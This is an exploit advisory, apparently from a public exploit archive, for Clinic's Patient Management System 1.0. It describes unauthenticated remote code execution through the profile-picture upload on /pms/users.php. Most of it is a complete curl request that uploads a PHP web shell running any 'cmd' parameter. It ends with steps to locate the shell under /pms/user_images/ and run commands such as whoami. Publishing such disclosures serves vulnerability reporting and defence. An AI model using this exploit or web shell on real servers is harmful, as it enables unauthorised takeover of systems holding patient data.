Headline
Clinic's Patient Management System 1.0 Shell Upload
Clinic’s Patient Management System version 1.0 suffers from a remote shell upload vulnerability.
# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE# Date: 07.10.2023# Exploit Author: Oğulcan Hami Gül# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code# Version: 1.0# Tested on: Windows 10## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.36' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: multipart/form-data; boundary=---------------------------11668063818537881393672984185' -H $'Origin: http://192.168.1.36' -H $'Connection: close' -H $'Referer: http://192.168.1.36/pms/users.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 787' \ --data-binary $'-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"display_name\"\x0d\x0a\x0d\x0aCannn3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"user_name\"\x0d\x0a\x0d\x0aGull3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"password\"\x0d\x0a\x0d\x0acangul\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"profile_picture\"; filename=\"phps.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0a if(isset($_GET[\'cmd\']))\x0a {\x0a system($_GET[\'cmd\']);\x0a }\x0a?>\x0a\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"save_user\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11668063818537881393672984185--\x0d\x0a' \ $'http://192.168.1.36/pms/users.php'## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/user_images/ without any authentication.## With the request http://192.168.1.36/pms/user_images/1696703526phps.php?cmd=whoami the attacker can execute arbitrary command on the application server.